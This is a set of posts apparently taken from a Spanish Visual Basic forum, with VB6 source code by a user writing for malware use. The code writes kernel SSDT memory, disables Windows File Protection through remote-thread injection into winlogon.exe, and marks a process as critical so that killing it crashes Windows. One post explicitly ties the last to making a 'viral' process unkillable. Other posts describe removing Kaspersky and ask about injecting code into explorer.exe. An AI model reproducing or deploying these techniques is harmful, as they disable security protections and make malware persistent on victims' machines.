  122. Dim FuncName(1023)                          As String
  123. Dim Address1(1023)                          As Long
  124. Dim Address2(1023)                          As Long
  125. Dim ModuleName(1023)                        As String
  126.  
  127. Dim dwServices                              As Long
  128. Dim dwKernelBase                            As Long
  129. Dim dwKiServiceTable                        As Long
  130.  
  ' Copies the service address that GetSSDT saved in Address1 over the working
  ' copy in Address2 for service index num. Nothing reaches the kernel here;
  ' WriteSSDT is what pushes Address2 back.
  Public Sub RecoverSSDT(ByVal num As Long)
      Address2(num) = Address1(num)
  End Sub
  134.  
  ' Writes the working copy of the service table (Address2, dwServices entries
  ' of 4 bytes) over the live KiServiceTable using ZwSystemDebugControl with
  ' SysDbgWriteVirtualMemory — a user-mode write into kernel memory that relies
  ' on SeDebugPrivilege. This call is the most characteristic action on the
  ' page for detection purposes; the memory commands of ZwSystemDebugControl
  ' are reported to be unavailable on Windows versions after XP — confirm.
  ' 12 = LenB(MEMORY_CHUNKS). The only error check is ReturnLength vs .Length.
  Public Sub WriteSSDT()
      Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
      With QueryBuff
          .Address = dwKiServiceTable + dwKernelBase
          .pData = VarPtr(Address2(0))
          .Length = dwServices * 4
          ZwSystemDebugControl SysDbgWriteVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
          If ReturnLength <> .Length Then MsgBox "SSDT Cannot Write", vbCritical
      End With
  End Sub
  145.  
  ' Reads a ModuleInformation record from raw memory at pmi. Only 284 bytes are
  ' copied, which is less than the size of the type as declared above (ImageName
  ' is 251 Longs); the remainder of the result stays zero-initialised.
  Private Function ModuleInformationFromPtr(ByVal pmi As Long) As ModuleInformation
      Dim rec As ModuleInformation
      CopyMemory VarPtr(rec), pmi, 284
      ModuleInformationFromPtr = rec
  End Function
  149.  
  ' Reads the 8-byte IMAGE_BASE_RELOCATION block header (VirtualAddress,
  ' SizeOfBlock) at pbr. No validation: pbr must point at readable memory.
  Private Function BaseRelocationFromPtr(ByVal pbr As Long) As IMAGE_BASE_RELOCATION
      Dim hdr As IMAGE_BASE_RELOCATION
      CopyMemory VarPtr(hdr), pbr, 8
      BaseRelocationFromPtr = hdr
  End Function
  153.  
  ' Decodes one 16-bit base-relocation entry at pfe: bits 0-11 are the page
  ' offset, bits 12-15 the relocation type (compared with IMAGE_REL_BASED_HIGHLOW
  ' by the caller).
  Private Function FixedEntryFromPtr(ByVal pfe As Long) As IMAGE_FIXED_ENTRY
      Dim tmp As Integer
      CopyMemory VarPtr(tmp), pfe, 2
      FixedEntryFromPtr.Offset = tmp And 4095
      ' Only the low byte of tmp is overwritten here (1 byte from pfe + 1, the
      ' high byte of the entry); the stale high byte is masked off by And 240.
      CopyMemory VarPtr(tmp), pfe + 1, 1
      FixedEntryFromPtr.Type = (tmp And 240) \ 16
  End Function
  161.  
  ' Returns the 32-bit value stored at address pdword (raw, unchecked read).
  Private Function DwordFromPtr(ByVal pdword As Long) As Long
      Dim value As Long
      CopyMemory VarPtr(value), pdword, 4
      DwordFromPtr = value
  End Function
  165.  
  ' Returns the 16-bit value at pword as an unsigned 0..65535: the two bytes are
  ' copied into the low half of a zeroed Long, so no sign extension happens.
  Private Function WordFromPtr(ByVal pword As Long) As Long
      Dim value As Long
      CopyMemory VarPtr(value), pword, 2
      WordFromPtr = value
  End Function
  169.  
  ' Locates the RVA of KiServiceTable inside a kernel image mapped with
  ' LoadLibraryEx (hModule), given the RVA of KeServiceDescriptorTable (dwKSDT).
  ' Technique (credited to Iceboy in the module header): walk the image's base
  ' relocations; each HIGHLOW fixup whose target is dwKSDT is a candidate, and
  ' the one preceded by the word &H5C7 (the first two bytes of a
  ' "mov dword ptr [disp32], imm32" instruction) is the store that initialises
  ' the descriptor, so the immediate four bytes further on is the table address.
  ' Returns 0 if no match is found.
  Private Function FindKiServiceTable(ByVal hModule As Long, ByVal dwKSDT As Long) As Long
      Dim DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
      Dim pbr As Long, pfe As Long, bFirstChunk As Boolean, I As Long, forto As Long
      Dim dwFixups As Long, dwPointerRva As Long, dwPointsToRva As Long
      ' 64 = size of IMAGE_DOS_HEADER; 168 = the partial IMAGE_NT_HEADER declared in this module
      CopyMemory VarPtr(DosHeader), hModule, 64
      With DosHeader
          ' "MZ" check. `Assert` is not a VB6 statement (Debug.Assert is); presumably a helper not on this page — verify.
          Assert .e_magic = &H5A4D
          CopyMemory VarPtr(NtHeader), hModule + .e_lfanew, 168
      End With
      ' NOTE(review): pbr is dereferenced in the loop below before it is ever
      ' assigned (it is 0 from Dim). As posted, the first read is from address 0.
      bFirstChunk = True
      ' One iteration per relocation block; a block with VirtualAddress 0 ends the list.
      Do While bFirstChunk Or CBool(BaseRelocationFromPtr(pbr).VirtualAddress)
          bFirstChunk = False
          ' Entries start right after the 8-byte block header; each is 2 bytes.
          pfe = pbr + 8
          forto = (BaseRelocationFromPtr(pbr).SizeOfBlock - 8) \ 2 - 1
          For I = 0 To forto
              If FixedEntryFromPtr(pfe).Type = IMAGE_REL_BASED_HIGHLOW Then
                  dwFixups = dwFixups + 1   ' counted but never used
                  dwPointerRva = BaseRelocationFromPtr(pbr).VirtualAddress + FixedEntryFromPtr(pfe).Offset
                  ' The fixup's 32-bit target, converted from VA to RVA
                  dwPointsToRva = DwordFromPtr(hModule + dwPointerRva) - NtHeader.ImageBase
                  If dwPointsToRva = dwKSDT Then
                      If WordFromPtr(hModule + dwPointerRva - 2) = &H5C7 Then
                          FindKiServiceTable = DwordFromPtr(hModule + dwPointerRva + 4) - NtHeader.ImageBase
                          Exit Function
                      End If
                  End If
              End If
              pfe = pfe + 2
          Next
          pbr = pbr + BaseRelocationFromPtr(pbr).SizeOfBlock
      Loop
  End Function
  201.  
  ' Left-pads Text with "0" up to Length characters. If Text is already longer
  ' than Length the pad count is negative and String raises error 5, as before.
  Private Function AddZero(ByVal Text As String, ByVal Length As Long) As String
      Dim padCount As Long
      padCount = Length - Len(Text)
      AddZero = String$(padCount, "0") & Text
  End Function
  205.  
' Compares the system service table as it appears in the kernel image file
' (mapped into this process with LoadLibraryEx) against the live table read
' from kernel memory, then calls RecoverSSDT/WriteSSDT for each entry that
' differs. This is the same image-vs-memory comparison anti-rootkit tools use
' to detect SSDT hooks.
'
' Module-level state written here (declared outside this listing):
'   dwServices, dwKernelBase, dwKiServiceTable, Address1(), Address2(), ModuleName()
'
' NOTE(review): On Error Resume Next hides every failure below (bad buffer
' size, failed LoadLibraryEx, failed debug-control read, ReturnLength never
' checked), so a partial or empty read is silently treated as "no differences".
Public Sub GetSSDT()
On Error Resume Next
    Dim I As Long, j As Long, Length As Long, Buff() As Byte, pKernelName As Long, hKernel As Long
    Dim dwKSDT As Long, pService As Long, DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
    dwServices = 0
    ' Two-call pattern: first call returns the required size, second fills Buff.
    ZwQuerySystemInformation SystemModuleInformation, 0, 0, VarPtr(Length)
    ReDim Buff(Length - 1)
    ZwQuerySystemInformation SystemModuleInformation, VarPtr(Buff(0)), Length, 0
    ' Buff(0..3) is the module count; the first module record starts at Buff(4)
    ' and is taken to be the kernel.
    With ModuleInformationFromPtr(VarPtr(Buff(4)))
        dwKernelBase = .Base
        pKernelName = VarPtr(.ImageName(0)) + .ModuleNameOffset
    End With
    ' Map the kernel file into this process with DONT_RESOLVE_DLL_REFERENCES
    ' (data mapping only) to read its tables.
    hKernel = LoadLibraryEx(pKernelName, 0, DONT_RESOLVE_DLL_REFERENCES)
    dwKSDT = GetProcAddress(hKernel, "KeServiceDescriptorTable")
    Assert dwKSDT <> 0
    dwKSDT = dwKSDT - hKernel          ' absolute address -> RVA
    dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT)
    Assert dwKiServiceTable <> 0
    CopyMemory VarPtr(DosHeader), hKernel, 64
    With DosHeader
        Assert .e_magic = &H5A4D       ' "MZ"
        CopyMemory VarPtr(NtHeader), hKernel + .e_lfanew, 168
    End With
    With NtHeader
        Assert .Signature = &H4550     ' "PE"
        Assert .Magic = &H10B          ' PE32 optional header
    End With
    ' Walk the table inside the mapped image: each dword is an address based on
    ' the file's ImageBase; stop at the first one that falls outside the image.
    ' Address1() receives the entries rebased onto the running kernel's base.
    pService = hKernel + dwKiServiceTable
    Do While DwordFromPtr(pService) - NtHeader.ImageBase < NtHeader.SizeOfImage
        Address1(dwServices) = DwordFromPtr(pService) - NtHeader.ImageBase + dwKernelBase
        pService = pService + 4
        dwServices = dwServices + 1
    Loop
    FreeLibrary hKernel
    ' Read the live table (dwServices dwords) from kernel memory into Address2()
    ' via a 12-byte MEMORY_CHUNKS request to ZwSystemDebugControl.
    Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
    With QueryBuff
        .Address = dwKernelBase + dwKiServiceTable
        .pData = VarPtr(Address2(0))
        .Length = dwServices * 4
    End With
    ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
    ' Attribute each live entry to the loaded module whose [Base, Base+Size)
    ' range contains it. Module records are 284 bytes each after the 4-byte count.
    Length = DwordFromPtr(VarPtr(Buff(0)))
    For I = 0 To Length - 1
        With ModuleInformationFromPtr(VarPtr(Buff(I * 284 + 4)))
            For j = 0 To dwServices - 1
                If Address2(j) >= .Base And Address2(j) < .Base + .Size Then
                    ModuleName(j) = StringFromPtr(VarPtr(.ImageName(0)))
                End If
            Next
        End With
    Next
    ' Every entry whose live value differs from the image-derived value is
    ' passed to RecoverSSDT; WriteSSDT is then invoked once per differing entry.
        For I = 0 To dwServices - 1
            If Address1(I) <> Address2(I) Then
                RecoverSSDT I
                WriteSSDT
            End If
        Next
End Sub
  264.  
  265. Private Function StringFromPtr(ByVal pString As Long) As String
  266.    Dim Buff() As Byte, Length As Long
  267.    Length = lstrlen(pString)
  268.    If Length = 0 Then Exit Function
  269.    ReDim Buff(Length - 1)
  270.    CopyMemory VarPtr(Buff(0)), pString, Length
  271.    StringFromPtr = StrConv(Buff, vbUnicode)
  272. End Function
  273.  
' Parses the export directory of the ntdll.dll already loaded in this process
' and iterates its name table. As written the loop only assigns ThisName and
' discards it; FuncRVA(), Ordinal() and ThisNumber are filled or declared but
' never consumed, so the routine has no observable effect beyond its Assert
' checks — it appears unfinished.
'
' NOTE(review): FuncRVA is sized as NumberOfFunctions - Base and copied from
' AddressOfFunctions + Base*4. The export address table is indexed from 0 by
' (ordinal - Base), so skipping Base entries looks suspicious — confirm.
Public Sub FindNtdllExport()
    Dim DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER, ExportDirectory As IMAGE_EXPORT_DIRECTORY
    Dim I As Long, hNtdll As Long, FuncRVA() As Long, NameRVA() As Long, Ordinal() As Integer, ThisName As String, ThisNumber As Long
    hNtdll = GetModuleHandle("ntdll.dll")
    Assert hNtdll <> 0
    CopyMemory VarPtr(DosHeader), hNtdll, 64
    With DosHeader
        Assert .e_magic = &H5A4D    ' "MZ"
        ' 128 bytes: enough of the NT headers to reach the export data
        ' directory entry (ExportTableRva/ExportTableSize) — confirm against
        ' the IMAGE_NT_HEADER layout declared elsewhere in this module.
        CopyMemory VarPtr(NtHeader), hNtdll + .e_lfanew, 128
    End With
    With NtHeader
        Assert .Signature = &H4550  ' "PE"
        Assert .Magic = &H10B       ' PE32
        Assert .SizeOfOptionalHeader >= 104
        Assert .NumberOfRvaAndSizes >= 1
        Assert .ExportTableSize >= 40
        CopyMemory VarPtr(ExportDirectory), hNtdll + .ExportTableRva, 40   ' IMAGE_EXPORT_DIRECTORY is 40 bytes
    End With
    With ExportDirectory
        Assert StringFromPtr(.name + hNtdll) = "ntdll.dll"
        ReDim FuncRVA(.NumberOfFunctions - .Base), NameRVA(.NumberOfNames - 1), Ordinal(.NumberOfNames - 1)
        CopyMemory VarPtr(FuncRVA(0)), hNtdll + .AddressOfFunctions + .Base * 4, (.NumberOfFunctions - .Base) * 4
        CopyMemory VarPtr(NameRVA(0)), hNtdll + .AddressOfNames, .NumberOfNames * 4
        CopyMemory VarPtr(Ordinal(0)), hNtdll + .AddressOfOrdinals, .NumberOfNames * 2
        For I = 0 To .NumberOfNames - 1
            ThisName = StringFromPtr(hNtdll + NameRVA(I))   ' computed and dropped
        Next
    End With
End Sub
  303.  
' Reads Length bytes of virtual memory at Address through the
' SysDbgReadVirtualMemory debug-control request and returns them as a Byte
' array. When fewer bytes than requested are reported back, an unallocated
' (empty) array is returned instead of partial data.
'
' NOTE(review): Length <= 0 makes the ReDim fail; callers must pass a positive
' size. This debug-control read path is a privileged interface (presumably
' needs the debug privilege and is not present on every Windows version) —
' confirm for the target OS.
Public Function ReadMemory(ByVal Address As Long, ByVal Length As Long) As Byte()
    Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long, Buff() As Byte
    ReDim Buff(Length - 1)
    With QueryBuff
        .Address = Address          ' source virtual address
        .pData = VarPtr(Buff(0))    ' destination buffer in this process
        .Length = Length
    End With
    ' 12 = size of the MEMORY_CHUNKS request as used in this module
    ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
    If ReturnLength = Length Then ReadMemory = Buff
End Function
  315.  
  316. Public Sub Assert(ByVal bBool As Boolean)
  317.    If Not bBool Then
  318.        MsgBox "Assertion Failed!", vbCritical, "Error"
  319.        End
  320.    End If
  321. End Sub
  322.  

4  Programación / Programación Visual Basic / Problema al Eliminar Kaspersky 2009 desde VB en: 23 Marzo 2009, 03:38 am
Realicé un programa en VB para eliminar el antivirus Kaspersky 2009 y funciona perfecto: quité el hook a las APIs, luego terminé el proceso y por último eliminé el driver KLIF.sys y las entradas del registro. Pero tengo un problema: klim5.sys es el filtro NDIS, y como elimino su entrada en el registro no puedo conectarme a internet desde la máquina en la cual eliminé el Kaspersky. Me toca ir a propiedades del adaptador de red y deshabilitar el Kaspersky Anti-Virus NDIS Filter, y se vuelve a habilitar la conexión. Mi pregunta es: ¿cómo puedo hacer esto desde mi código en VB?




Gracias de Antemano  ;D
5  Programación / Programación Visual Basic / [SRC] Deshabilitar WFP [Windows File Protection] en: 14 Febrero 2009, 18:26 pm
Esta técnica pone fin al hilo SFC Watcher, que continuamente espera y responde a las notificaciones de cambio de directorio o a las acciones que se le señalan.
Para ello, SFC_OS.DLL nos brinda una función sin nombre, exportada por el ordinal 2: SfcTerminateWatcherThread. Esta API no acepta parámetros y hace exactamente lo que su nombre implica. Sin embargo, hay una sola manera de usar esta función: debe ser invocada en el proceso que creó el SFC Watcher Thread: winlogon.exe.

Para ello debemos inyectar, y llamar a la función desde el propio Winlogon

Este code deja deshabilitada la protección hasta el próximo reinicio, pudiendo de esta forma modificar los ficheros del sistema que protege WFP. Espero les sea de utilidad.


Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module        : mDisableWFP
  3. ' Fecha         : 15/02/2009 12:10
  4. ' Autor         : XcryptOR
  5. ' Proposito     : Deshabilita la WFP (Windows File Protection)Hasta el proximo Reinicio
  6. ' SO            : Windows XP Sp1, Sp2, Sp3
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Declare Function OpenProcessToken Lib "advapi32.dll" ( _
  10. ByVal ProcessHandle As Long, _
  11. ByVal DesiredAccess As Long, _
  12. TokenHandle As Long) As Long
  13.  
  14. Declare Function CloseHandle Lib "kernel32.dll" ( _
  15. ByVal hObject As Long) As Long
  16.  
  17. Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
  18.  
  19. Declare Function AdjustTokenPrivileges Lib "advapi32.dll" ( _
  20. ByVal TokenHandle As Long, _
  21. ByVal DisableAllPrivileges As Long, _
  22. ByRef NewState As TOKEN_PRIVILEGES, _
  23. ByVal BufferLength As Long, _
  24. PreviousState As Any, _
  25. ReturnLength As Long) As Long
  26.  
  27. Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" ( _
  28. ByVal lpSystemName As String, _
  29. ByVal lpName As String, _
  30. lpLuid As LUID) As Long
  31.  
  32. Declare Function CreateToolhelp32Snapshot Lib "kernel32.dll" ( _
  33. ByVal dwFlags As Long, _
  34. ByVal th32ProcessID As Long) As Long
  35.  
  36. Declare Function Process32First Lib "kernel32.dll" ( _
  37. ByVal hSnapshot As Long, _
  38. lppe As PROCESSENTRY32) As Long
  39.  
  40. Declare Function Process32Next Lib "kernel32.dll" ( _
  41. ByVal hSnapshot As Long, _
  42. lppe As PROCESSENTRY32) As Long
  43.  
  44. Declare Function OpenProcess Lib "kernel32.dll" ( _
  45. ByVal dwDesiredAccess As Long, _
  46. ByVal bInheritHandle As Long, _
  47. ByVal dwProcessId As Long) As Long
  48.  
  49. Declare Function CreateRemoteThread Lib "kernel32.dll" ( _
  50. ByVal hProcess As Long, _
  51. ByRef lpThreadAttributes As Any, _
  52. ByVal dwStackSize As Long, _
  53. ByVal StartAddress As Long, _
  54. ByRef lpParameter As Any, _
  55. ByVal dwCreationFlags As Long, _
  56. ByRef lpThreadId As Long) As Long
  57.  
  58. Declare Function LoadLibrary Lib "kernel32.dll" Alias "LoadLibraryA" ( _
  59. ByVal lpLibFileName As String) As Long
  60.  
  61. Declare Function GetProcAddress Lib "kernel32.dll" ( _
  62. ByVal hModule As Long, _
  63. ByVal OrdinalNumber As Long) As Long
  64.  
  65. Declare Function FreeLibrary Lib "kernel32.dll" ( _
  66. ByVal hLibModule As Long) As Long
  67.  
  68. Declare Function WaitForSingleObject Lib "kernel32.dll" ( _
  69. ByVal hHandle As Long, _
  70. ByVal dwMilliseconds As Long) As Long
  71.  
Const TOKEN_ALL_ACCESS = 983551          ' &HF01FF
Const PROCESS_ALL_ACCESS = &H1F0FFF
Const TH32CS_SNAPPROCESS As Long = &H2   ' Toolhelp snapshot of the process list
' NOTE(review): &HFFFF& evaluates to 65535, not the Win32 INFINITE value
' (&HFFFFFFFF / -1); the WaitForSingleObject in DisableWFP therefore gives up
' after about 65 seconds rather than waiting indefinitely.
Const INFINITE = &HFFFF&

' Locally unique identifier filled in by LookupPrivilegeValue.
Type LUID
        LowPart             As Long
        HighPart            As Long
End Type

' One privilege entry: its LUID plus attribute flags (2 = enabled, see SetPrivilegies).
Type LUID_AND_ATTRIBUTES
        pLuid               As LUID
        Attributes          As Long
End Type

' Buffer passed to AdjustTokenPrivileges; only Privileges(0) is used here.
Type TOKEN_PRIVILEGES
        PrivilegeCount      As Long
        Privileges(1)       As LUID_AND_ATTRIBUTES
End Type

' Toolhelp process record; dwSize must be set to Len(...) before the first call.
Type PROCESSENTRY32
        dwSize              As Long
        cntUsage            As Long
        th32ProcessID       As Long
        th32DefaultHeapID   As Long
        th32ModuleID        As Long
        cntThreads          As Long
        th32ParentProcessID As Long
        pcPriClassBase      As Long
        dwFlags             As Long
        szExeFile           As String * 260
End Type
  104.  
  105. Sub Main()
  106.  
  107.    SetPrivilegies
  108.  
  109.    If DisableWFP = True Then
  110.        MsgBox "Se ha deshabilitado la WFP, hasta el proximo reinicio."
  111.    Else
  112.        MsgBox "Error al abrir winlogon! no se puede desactivar WFP"
  113.    End If
  114.  
  115.  
  116. End Sub
  117.  
  118. '==============================================================================
  119. '================ OBTENER PID (PROCESS ID) DEL NOMBRE =========================
  120. '==============================================================================
  121. Public Function GetPid(szProcess As String)
  122.    On Error Resume Next
  123.  
  124.    Dim Pid         As Long
  125.    Dim l           As Long
  126.    Dim l1          As Long
  127.    Dim l2          As Long
  128.    Dim Ol          As Long
  129.    Dim pShot       As PROCESSENTRY32
  130.  
  131.    l1 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
  132.    pShot.dwSize = Len(pShot)
  133.    l2 = Process32Next(l1, pShot)
  134.    Do While l2
  135.        If InStr(pShot.szExeFile, szProcess) <> 0 Then
  136.            Pid = pShot.th32ProcessID
  137.            GetPid = Pid
  138.        End If
  139.        l2 = Process32Next(l1, pShot)
  140.    Loop
  141.    l = CloseHandle(l1)
  142.  
  143. End Function
  144. '==============================================================================
  145. '=========================== OBTENER PRIVILEGIOS ==============================
  146. '==============================================================================
' Enables SeDebugPrivilege on the current process token; DisableWFP then
' opens winlogon.exe with PROCESS_ALL_ACCESS. Attributes = 2 is
' SE_PRIVILEGE_ENABLED. Terminates the process with End when the token
' cannot be opened.
'
' NOTE(review): the LookupPrivilegeValue and AdjustTokenPrivileges results are
' not checked. AdjustTokenPrivileges returns success even when the privilege
' is not present in the token (ERROR_NOT_ALL_ASSIGNED), so a caller without
' that privilege continues as if it had been enabled.
Sub SetPrivilegies()

    Dim hToken      As Long
    Dim pLuid       As LUID
    Dim TokenPriv   As TOKEN_PRIVILEGES

    If OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, hToken) = 0 Then
        End
    End If

    LookupPrivilegeValue vbNullString, "SeDebugPrivilege", pLuid

    With TokenPriv
        .PrivilegeCount = 1
        .Privileges(0).pLuid = pLuid
        .Privileges(0).Attributes = 2   ' SE_PRIVILEGE_ENABLED
    End With

    ' PreviousState / ReturnLength passed as NULL: no previous state requested.
    AdjustTokenPrivileges hToken, 0, TokenPriv, Len(TokenPriv), ByVal 0&, ByVal 0&
    CloseHandle hToken

End Sub
  169. '==============================================================================
  170. '==== DESHABILITAR LA WFP (WINDOWS FILE PROTECTION) HASTA PROXIMO REINICIO ====
  171. '==============================================================================
  172.  
' Runs sfc_os.dll's ordinal-2 export (SfcTerminateWatcherThread) as a remote
' thread inside winlogon.exe, which stops the SFC watcher thread until reboot.
' Returns True once the remote thread has been waited on.
'
' Defender note: a user process opening winlogon.exe with PROCESS_ALL_ACCESS
' and then calling CreateRemoteThread on it is a high-signal sequence for
' endpoint monitoring; the debug privilege enabled in SetPrivilegies is the
' precondition.
'
' NOTE(review): when winlogon cannot be opened, End terminates the whole
' process, so "DisableWFP = False" is never returned and Main's Else branch
' is unreachable. LoadLibrary, GetProcAddress and CreateRemoteThread results
' are not checked (a 0 start address would be passed through), the remote
' thread handle is never closed, and the address resolved in this process is
' assumed to be meaningful inside winlogon without verification.
Function DisableWFP() As Boolean

    Dim LoadDll     As Long
    Dim hProcess    As Long
    Dim RemThread   As Long
    Dim SfcTerminateWatcherThread  As Long

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPid("winlogon.exe"))

    If hProcess = 0 Then
        DisableWFP = False
        End
    End If

    LoadDll = LoadLibrary("SFC_OS.DLL")          ' sfc_os.dll
    SfcTerminateWatcherThread = GetProcAddress(LoadDll, 2)      ' SfcTerminateWatcherThread API, ordinal #2 of sfc_os.dll
    RemThread = CreateRemoteThread(hProcess, ByVal 0&, 0, ByVal SfcTerminateWatcherThread, ByVal 0&, 0, ByVal 0&)

    ' INFINITE is defined in this module as &HFFFF& (65535 ms), so this wait
    ' is bounded at roughly 65 s, not unbounded.
    WaitForSingleObject RemThread, INFINITE
    CloseHandle hProcess
    FreeLibrary LoadDll
    DisableWFP = True

End Function
  197.  
6  Programación / Programación Visual Basic / Generador GUID en: 6 Febrero 2009, 15:42 pm
Code útil para utilizar el método de inicio ActiveX (ActiveX Startup Method); este code genera un número único de la forma: {89B4C1CD-B018-4511-B0A1-5476DBF70820}.
Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module      : mGenGUID
  3. ' Fecha       : 05/02/2009 18:10
  4. ' Autor       : XcryptOR
  5. ' Proposito   : Generar un número de identificación unico
  6. ' Creditos    : Creditos a trilithium, Autor del code original en Delphi
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Option Explicit
  10.  
  11. Private Type GUID
  12.    Data1           As Long
  13.    Data2           As Integer
  14.    Data3           As Integer
  15.    Data4(7)        As Byte
  16. End Type
  17.  
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
pDest As Any, _
pSource As Any, _
ByVal dwLength As Long)

Private Declare Function StringFromCLSID Lib "ole32" ( _
pclsid As GUID, _
lpsz As Long) As Long

Private Declare Function CoCreateGuid Lib "OLE32.DLL" (pGuid As GUID) As Long

Private Declare Sub CoTaskMemFree Lib "ole32" (ByVal pv As Long)
  28.  
  29. Public Function GetGUID() As String
  30.    Dim udtGUID     As GUID
  31.    If (CoCreateGuid(udtGUID) = 0) Then
  32.        GetGUID = GUIDToStr(udtGUID)
  33.    End If
  34. End Function
  35.  
  36. Private Function GUIDToStr(ID As GUID) As String
  37.    Dim strRet      As String
  38.    Dim ptrSource   As Long
  39.    Dim lngRet      As Long
  40.  
  41.    strRet = Space(38)
  42.    lngRet = StringFromCLSID(ID, ptrSource)
  43.    If lngRet = 0 Then
  44.        CopyMemory ByVal StrPtr(strRet), ByVal ptrSource, 76
  45.        GUIDToStr = strRet
  46.    End If
  47. End Function
7  Programación / Programación Visual Basic / Actualizar Datagrid despues de eliminar un registro en: 18 Enero 2009, 21:30 pm
Hola, tengo un pequeño gran inconveniente; es lo único en lo que no he podido avanzar de mi proyecto. La verdad he googleado bastante y nada; ojalá alguno de ustedes pueda ayudarme.

Lo que necesito es que, al eliminar un registro de mi base de datos, el DataGrid que los muestra en el form se actualice y ya no me muestre el dato eliminado. Muchas gracias.
8  Programación / Programación Visual Basic / API RtlSetProcessIsCritical en: 11 Noviembre 2008, 23:41 pm
Bueno este code hace uso de un API nativa de NTDLL.dll la cual setea nuestro proceso como un proceso critico del sistema al igual que winlogon o csrss, bueno el resultado de terminar nuestro proceso dara como resultado la BSOD (Blue Screen Of Death) de windows, espero les sea de utilidad, aplicandolo a nuestra especie viral haria que nuestro proceso no se pudiera terminar. casi interminable.

Codigo del Form:

Código
  1. '*************************************************************************
  2. '*************************************************************************
  3. ' Uso de RtlSetProcessIsCritical para setear nuestro proceso, como proceso
  4. ' critico del sistema: del mismo modo que csrss.exe o winlogon
  5. ' XcryptOR - Made In Colombia
  6. '**************************************************************************
  7. '*************************************************************************
' On form load: enables the debug privilege, then calls RtlSetProcessIsCritical
' so this process is flagged as system-critical. On Error Resume Next hides a
' failure of either call, and the ObtenerPrivilegios result is ignored.
'
' Defender note: terminating a critical-flagged user process bugchecks the
' machine; the RtlSetProcessIsCritical import itself is the observable indicator.
' NOTE(review): per the module's Declare the arguments are NewValue=0,
' OldValue=0, WinLogon=1 — confirm this matches the native signature intended.
Private Sub Form_Load()
On Error Resume Next
ObtenerPrivilegios SE_DEBUG_NAME ' obtain the debug privilege
Call RtlSetProcessIsCritical(0, 0, 1) ' flag this process as critical
End Sub
  13.  

Codigo Modulo:

Código
  1. Option Explicit
  2.  
  3. Private Const ANYSIZE_ARRAY = 1
  4. Private Const TOKEN_ADJUST_PRIVILEGES = &H20
  5. Private Const TOKEN_QUERY = &H8
  6. Private Const SE_PRIVILEGE_ENABLED = &H2
  7.  
  8. Private Type LUID
  9.    LowPart As Long
  10.    HighPart As Long
  11. End Type
  12. Private Type LUID_AND_ATTRIBUTES
  13.        pLuid As LUID
  14.        Attributes As Long
  15. End Type
  16. Private Type TOKEN_PRIVILEGES
  17.    PrivilegeCount As Long
  18.    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
  19. End Type
  20.  
  21.  
Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  26.  
  27.  
  28.  
  29. Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"
  30.  
  31.  
  32. Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean)
  33.  
  34. Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long
  35.  
  36. Dim lpLUID As LUID
  37. Dim lpToken As TOKEN_PRIVILEGES
  38. Dim lpAntToken As TOKEN_PRIVILEGES
  39. Dim hToken As Long
  40. Dim hProcess As Long
  41. Dim res As Long
  42.  
  43. hProcess = GetCurrentProcess()
  44. res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
  45. If res = 0 Then
  46.    Exit Function
  47. End If
  48. res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
  49. If res = 0 Then
  50.    Exit Function
  51. End If
  52. With lpToken
  53.    .PrivilegeCount = 1
  54.    .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
  55.    .Privileges(0).pLuid = lpLUID
  56. End With
  57.  
  58. res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
  59. If res = 0 Then
  60.    Exit Function
  61. End If
  62. ObtenerPrivilegios = res
  63. End Function
  64.  

saludos
9  Programación / Programación Visual Basic / EXE Injection en: 7 Octubre 2008, 15:41 pm
tengo una duda, la inyección de code solo se puede hacer a otro ejecutable en VB, oh podria inyectar mi code a explorer.exe?

podria alguien postear algun code que sirva.

Código
  1. Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  2. Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
